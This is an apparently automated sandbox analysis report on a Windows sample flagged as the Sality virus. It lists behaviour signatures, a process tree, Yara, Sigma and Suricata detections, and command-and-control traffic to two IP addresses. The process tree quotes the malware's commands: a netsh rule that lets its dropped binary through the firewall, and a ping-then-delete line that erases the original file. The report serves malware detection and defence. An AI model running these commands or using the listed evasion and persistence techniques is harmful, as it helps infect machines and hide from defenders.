Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Sector.30.15961.3704.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
Analysis ID:1536957
MD5:fa45b9c5e2a92b1b3d7d175c23ffc813
SHA1:5832cef41cad1bc57ea1424572a3127a5ccba956
SHA256:20d84dd8c73993a1012d7a9d9b837aa118182cb16daf4169a266c0b48a708af7
Tags:exeSality
Infos:

Detection

Sality
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject threads in other processes
Creates HTML files with .exe extension (expired dropper behavior)
Creates a thread in another existing process (thread injection)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables the Smart Screen filter
Disables user account control notifications
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
Monitors registry run keys for changes
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Desusertion Ports
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Sector.30.15961.3704.exe (PID: 1376 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe" MD5: FA45B9C5E2A92B1B3D7D175C23FFC813)
    • fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • jvauyc32.exe (PID: 800 cmdline: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe MD5: FA45B9C5E2A92B1B3D7D175C23FFC813)
      • cmd.exe (PID: 7236 cmdline: /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7288 cmdline: netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • jvauyc32.exe (PID: 7352 cmdline: "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe" MD5: FA45B9C5E2A92B1B3D7D175C23FFC813)
      • sihost.exe (PID: 3400 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3452 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3520 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 3904 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • jvauyc32.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe" MD5: FA45B9C5E2A92B1B3D7D175C23FFC813)
      • svchost.exe (PID: 4336 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • StartMenuExperienceHost.exe (PID: 4812 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
      • RuntimeBroker.exe (PID: 4912 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SearchApp.exe (PID: 5016 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
      • RuntimeBroker.exe (PID: 4472 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 4852 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • smartscreen.exe (PID: 2780 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
      • ApplicationFrameHost.exe (PID: 6352 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
      • WinStore.App.exe (PID: 6380 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
      • RuntimeBroker.exe (PID: 6676 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • TextInputHost.exe (PID: 6720 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
      • svchost.exe (PID: 1156 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sedSmibSjDOiaD.exe (PID: 3440 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 7000 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 3332 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 6876 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 5796 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 7140 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • cmd.exe (PID: 6132 cmdline: /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7204 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SalityF-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.InfectionSality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.PayloadOnce installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
  • Salty Spider
https://malpedia.caad.fkie.fraunhofer.de/details/win.sality

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe PID: 1376JoeSecurity_SalityYara detected SalityJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpackJoeSecurity_SalityYara detected SalityJoe Security
      1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
      • 0x31904:$s1: Simple Poly Engine v
      1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpackJoeSecurity_SalityYara detected SalityJoe Security
        1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x22520:$s1: Simple Poly Engine v
        1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1430cc4.9.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x185c:$s1: Simple Poly Engine v

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Communication To Uncommon Desusertion Ports
        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 190.120.227.91, DesusertionIsIpv6: false, DesusertionPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, Initiated: true, ProcessId: 1376, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49709
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ParentImage: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ParentProcessId: 800, ParentProcessName: jvauyc32.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3452, ProcessName: svchost.exe
        Sigma detected: Use NTFS Short Name in Command Line
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE", CommandLine: /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, ParentProcessId: 1376, ParentProcessName: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, ProcessCommandLine: /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE", ProcessId: 6132, ProcessName: cmd.exe
        Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ProcessId: 800, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\jvauyc32.exe
        Sigma detected: Modification of IE Registry Settings
        Source: Registry Key setAuthor: frack113: Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, ProcessId: 1376, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ParentImage: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ParentProcessId: 800, ParentProcessName: jvauyc32.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3452, ProcessName: svchost.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-18T12:41:39.935484+020020127361Malware Command and Control Activity Detected192.168.2.949709190.120.227.918080TCP
        2024-10-18T12:41:53.402228+020020127361Malware Command and Control Activity Detected192.168.2.949719190.120.227.918080TCP
        2024-10-18T12:41:59.701403+020020127361Malware Command and Control Activity Detected192.168.2.949722190.120.227.918080TCP
        2024-10-18T12:42:06.031031+020020127361Malware Command and Control Activity Detected192.168.2.949724190.120.227.918080TCP
        2024-10-18T12:42:11.645323+020020127361Malware Command and Control Activity Detected192.168.2.949726190.120.227.918080TCP
        2024-10-18T12:42:17.298575+020020127361Malware Command and Control Activity Detected192.168.2.949728190.120.227.918080TCP
        2024-10-18T12:42:22.644756+020020127361Malware Command and Control Activity Detected192.168.2.949730190.120.227.918080TCP
        2024-10-18T12:42:28.989555+020020127361Malware Command and Control Activity Detected192.168.2.949732190.120.227.918080TCP
        2024-10-18T12:42:34.518806+020020127361Malware Command and Control Activity Detected192.168.2.949736190.120.227.918080TCP
        2024-10-18T12:42:41.055615+020020127361Malware Command and Control Activity Detected192.168.2.949738190.120.227.918080TCP
        2024-10-18T12:42:47.487267+020020127361Malware Command and Control Activity Detected192.168.2.949741190.120.227.918080TCP
        2024-10-18T12:42:54.346733+020020127361Malware Command and Control Activity Detected192.168.2.949767190.120.227.918080TCP
        2024-10-18T12:43:00.351728+020020127361Malware Command and Control Activity Detected192.168.2.949789190.120.227.918080TCP
        2024-10-18T12:43:05.816068+020020127361Malware Command and Control Activity Detected192.168.2.949814190.120.227.918080TCP
        2024-10-18T12:43:11.408873+020020127361Malware Command and Control Activity Detected192.168.2.949842190.120.227.918080TCP
        2024-10-18T12:43:17.555326+020020127361Malware Command and Control Activity Detected192.168.2.949870190.120.227.918080TCP
        2024-10-18T12:43:23.986856+020020127361Malware Command and Control Activity Detected192.168.2.949899190.120.227.918080TCP
        2024-10-18T12:43:31.472599+020020127361Malware Command and Control Activity Detected192.168.2.949927190.120.227.918080TCP
        2024-10-18T12:43:37.472929+020020127361Malware Command and Control Activity Detected192.168.2.949955190.120.227.918080TCP
        2024-10-18T12:43:43.404850+020020127361Malware Command and Control Activity Detected192.168.2.949983190.120.227.918080TCP
        2024-10-18T12:43:49.504205+020020127361Malware Command and Control Activity Detected192.168.2.950007190.120.227.918080TCP
        2024-10-18T12:43:55.528705+020020127361Malware Command and Control Activity Detected192.168.2.950028190.120.227.918080TCP
        2024-10-18T12:44:01.393948+020020127361Malware Command and Control Activity Detected192.168.2.950030190.120.227.918080TCP
        2024-10-18T12:44:07.519217+020020127361Malware Command and Control Activity Detected192.168.2.950033190.120.227.918080TCP
        2024-10-18T12:44:13.364041+020020127361Malware Command and Control Activity Detected192.168.2.950035190.120.227.918080TCP
        2024-10-18T12:44:19.380085+020020127361Malware Command and Control Activity Detected192.168.2.950037190.120.227.918080TCP
        2024-10-18T12:44:25.769055+020020127361Malware Command and Control Activity Detected192.168.2.950039190.120.227.918080TCP
        2024-10-18T12:44:32.108634+020020127361Malware Command and Control Activity Detected192.168.2.950041190.120.227.918080TCP
        2024-10-18T12:44:38.544056+020020127361Malware Command and Control Activity Detected192.168.2.950043190.120.227.918080TCP
        2024-10-18T12:44:44.568350+020020127361Malware Command and Control Activity Detected192.168.2.950045190.120.227.918080TCP
        2024-10-18T12:44:51.551466+020020127361Malware Command and Control Activity Detected192.168.2.950048190.120.227.918080TCP
        2024-10-18T12:44:57.651692+020020127361Malware Command and Control Activity Detected192.168.2.950050190.120.227.918080TCP
        2024-10-18T12:45:03.284445+020020127361Malware Command and Control Activity Detected192.168.2.950052190.120.227.918080TCP
        2024-10-18T12:45:09.512490+020020127361Malware Command and Control Activity Detected192.168.2.950054190.120.227.918080TCP
        2024-10-18T12:45:15.957815+020020127361Malware Command and Control Activity Detected192.168.2.950056190.120.227.918080TCP
        2024-10-18T12:45:21.957273+020020127361Malware Command and Control Activity Detected192.168.2.950058190.120.227.918080TCP
        2024-10-18T12:45:27.761668+020020127361Malware Command and Control Activity Detected192.168.2.950060190.120.227.918080TCP
        2024-10-18T12:45:33.753048+020020127361Malware Command and Control Activity Detected192.168.2.950062190.120.227.918080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-18T12:41:34.975221+020020183401Malware Command and Control Activity Detected192.168.2.949707185.53.178.5080TCP
        2024-10-18T12:41:39.935484+020020183401Malware Command and Control Activity Detected192.168.2.949709190.120.227.918080TCP
        2024-10-18T12:41:41.407737+020020183401Malware Command and Control Activity Detected192.168.2.949712185.53.178.5080TCP
        2024-10-18T12:41:49.368405+020020183401Malware Command and Control Activity Detected192.168.2.949716185.53.178.5080TCP
        2024-10-18T12:41:53.402228+020020183401Malware Command and Control Activity Detected192.168.2.949719190.120.227.918080TCP
        2024-10-18T12:41:55.419204+020020183401Malware Command and Control Activity Detected192.168.2.949721185.53.178.5080TCP
        2024-10-18T12:41:59.701403+020020183401Malware Command and Control Activity Detected192.168.2.949722190.120.227.918080TCP
        2024-10-18T12:42:01.531631+020020183401Malware Command and Control Activity Detected192.168.2.949723185.53.178.5080TCP
        2024-10-18T12:42:06.031031+020020183401Malware Command and Control Activity Detected192.168.2.949724190.120.227.918080TCP
        2024-10-18T12:42:07.602990+020020183401Malware Command and Control Activity Detected192.168.2.949725185.53.178.5080TCP
        2024-10-18T12:42:11.645323+020020183401Malware Command and Control Activity Detected192.168.2.949726190.120.227.918080TCP
        2024-10-18T12:42:13.239676+020020183401Malware Command and Control Activity Detected192.168.2.949727185.53.178.5080TCP
        2024-10-18T12:42:17.298575+020020183401Malware Command and Control Activity Detected192.168.2.949728190.120.227.918080TCP
        2024-10-18T12:42:18.602435+020020183401Malware Command and Control Activity Detected192.168.2.949729185.53.178.5080TCP
        2024-10-18T12:42:22.644756+020020183401Malware Command and Control Activity Detected192.168.2.949730190.120.227.918080TCP
        2024-10-18T12:42:24.726632+020020183401Malware Command and Control Activity Detected192.168.2.949731185.53.178.5080TCP
        2024-10-18T12:42:28.989555+020020183401Malware Command and Control Activity Detected192.168.2.949732190.120.227.918080TCP
        2024-10-18T12:42:30.465354+020020183401Malware Command and Control Activity Detected192.168.2.949735185.53.178.5080TCP
        2024-10-18T12:42:34.518806+020020183401Malware Command and Control Activity Detected192.168.2.949736190.120.227.918080TCP
        2024-10-18T12:42:36.979019+020020183401Malware Command and Control Activity Detected192.168.2.949737185.53.178.5080TCP
        2024-10-18T12:42:41.055615+020020183401Malware Command and Control Activity Detected192.168.2.949738190.120.227.918080TCP
        2024-10-18T12:42:42.705591+020020183401Malware Command and Control Activity Detected192.168.2.949740185.53.178.5080TCP
        2024-10-18T12:42:47.487267+020020183401Malware Command and Control Activity Detected192.168.2.949741190.120.227.918080TCP
        2024-10-18T12:42:49.865347+020020183401Malware Command and Control Activity Detected192.168.2.949759185.53.178.5080TCP
        2024-10-18T12:42:54.346733+020020183401Malware Command and Control Activity Detected192.168.2.949767190.120.227.918080TCP
        2024-10-18T12:42:56.008076+020020183401Malware Command and Control Activity Detected192.168.2.949784185.53.178.5080TCP
        2024-10-18T12:43:00.351728+020020183401Malware Command and Control Activity Detected192.168.2.949789190.120.227.918080TCP
        2024-10-18T12:43:01.755354+020020183401Malware Command and Control Activity Detected192.168.2.949806185.53.178.5080TCP
        2024-10-18T12:43:05.816068+020020183401Malware Command and Control Activity Detected192.168.2.949814190.120.227.918080TCP
        2024-10-18T12:43:07.131282+020020183401Malware Command and Control Activity Detected192.168.2.949835185.53.178.5080TCP
        2024-10-18T12:43:11.408873+020020183401Malware Command and Control Activity Detected192.168.2.949842190.120.227.918080TCP
        2024-10-18T12:43:12.995616+020020183401Malware Command and Control Activity Detected192.168.2.949861185.53.178.5080TCP
        2024-10-18T12:43:17.555326+020020183401Malware Command and Control Activity Detected192.168.2.949870190.120.227.918080TCP
        2024-10-18T12:43:19.906299+020020183401Malware Command and Control Activity Detected192.168.2.949889185.53.178.5080TCP
        2024-10-18T12:43:23.986856+020020183401Malware Command and Control Activity Detected192.168.2.949899190.120.227.918080TCP
        2024-10-18T12:43:25.649318+020020183401Malware Command and Control Activity Detected192.168.2.949918185.53.178.5080TCP
        2024-10-18T12:43:31.472599+020020183401Malware Command and Control Activity Detected192.168.2.949927190.120.227.918080TCP
        2024-10-18T12:43:33.227599+020020183401Malware Command and Control Activity Detected192.168.2.949949185.53.178.5080TCP
        2024-10-18T12:43:37.472929+020020183401Malware Command and Control Activity Detected192.168.2.949955190.120.227.918080TCP
        2024-10-18T12:43:39.087157+020020183401Malware Command and Control Activity Detected192.168.2.949977185.53.178.5080TCP
        2024-10-18T12:43:43.404850+020020183401Malware Command and Control Activity Detected192.168.2.949983190.120.227.918080TCP
        2024-10-18T12:43:45.144872+020020183401Malware Command and Control Activity Detected192.168.2.950001185.53.178.5080TCP
        2024-10-18T12:43:49.504205+020020183401Malware Command and Control Activity Detected192.168.2.950007190.120.227.918080TCP
        2024-10-18T12:43:51.117597+020020183401Malware Command and Control Activity Detected192.168.2.950027185.53.178.5080TCP
        2024-10-18T12:43:55.528705+020020183401Malware Command and Control Activity Detected192.168.2.950028190.120.227.918080TCP
        2024-10-18T12:43:57.133083+020020183401Malware Command and Control Activity Detected192.168.2.950029185.53.178.5080TCP
        2024-10-18T12:44:01.393948+020020183401Malware Command and Control Activity Detected192.168.2.950030190.120.227.918080TCP
        2024-10-18T12:44:03.034471+020020183401Malware Command and Control Activity Detected192.168.2.950032185.53.178.5080TCP
        2024-10-18T12:44:07.519217+020020183401Malware Command and Control Activity Detected192.168.2.950033190.120.227.918080TCP
        2024-10-18T12:44:09.073539+020020183401Malware Command and Control Activity Detected192.168.2.950034185.53.178.5080TCP
        2024-10-18T12:44:13.364041+020020183401Malware Command and Control Activity Detected192.168.2.950035190.120.227.918080TCP
        2024-10-18T12:44:14.966939+020020183401Malware Command and Control Activity Detected192.168.2.950036185.53.178.5080TCP
        2024-10-18T12:44:19.380085+020020183401Malware Command and Control Activity Detected192.168.2.950037190.120.227.918080TCP
        2024-10-18T12:44:20.972483+020020183401Malware Command and Control Activity Detected192.168.2.950038185.53.178.5080TCP
        2024-10-18T12:44:25.769055+020020183401Malware Command and Control Activity Detected192.168.2.950039190.120.227.918080TCP
        2024-10-18T12:44:27.259821+020020183401Malware Command and Control Activity Detected192.168.2.950040185.53.178.5080TCP
        2024-10-18T12:44:32.108634+020020183401Malware Command and Control Activity Detected192.168.2.950041190.120.227.918080TCP
        2024-10-18T12:44:34.003474+020020183401Malware Command and Control Activity Detected192.168.2.950042185.53.178.5080TCP
        2024-10-18T12:44:38.544056+020020183401Malware Command and Control Activity Detected192.168.2.950043190.120.227.918080TCP
        2024-10-18T12:44:40.244422+020020183401Malware Command and Control Activity Detected192.168.2.950044185.53.178.5080TCP
        2024-10-18T12:44:44.568350+020020183401Malware Command and Control Activity Detected192.168.2.950045190.120.227.918080TCP
        2024-10-18T12:44:47.270315+020020183401Malware Command and Control Activity Detected192.168.2.950046185.53.178.5080TCP
        2024-10-18T12:44:51.551466+020020183401Malware Command and Control Activity Detected192.168.2.950048190.120.227.918080TCP
        2024-10-18T12:44:53.223461+020020183401Malware Command and Control Activity Detected192.168.2.950049185.53.178.5080TCP
        2024-10-18T12:44:57.651692+020020183401Malware Command and Control Activity Detected192.168.2.950050190.120.227.918080TCP
        2024-10-18T12:44:59.153333+020020183401Malware Command and Control Activity Detected192.168.2.950051185.53.178.5080TCP
        2024-10-18T12:45:03.284445+020020183401Malware Command and Control Activity Detected192.168.2.950052190.120.227.918080TCP
        2024-10-18T12:45:04.962592+020020183401Malware Command and Control Activity Detected192.168.2.950053185.53.178.5080TCP
        2024-10-18T12:45:09.512490+020020183401Malware Command and Control Activity Detected192.168.2.950054190.120.227.918080TCP
        2024-10-18T12:45:11.224026+020020183401Malware Command and Control Activity Detected192.168.2.950055185.53.178.5080TCP
        2024-10-18T12:45:15.957815+020020183401Malware Command and Control Activity Detected192.168.2.950056190.120.227.918080TCP
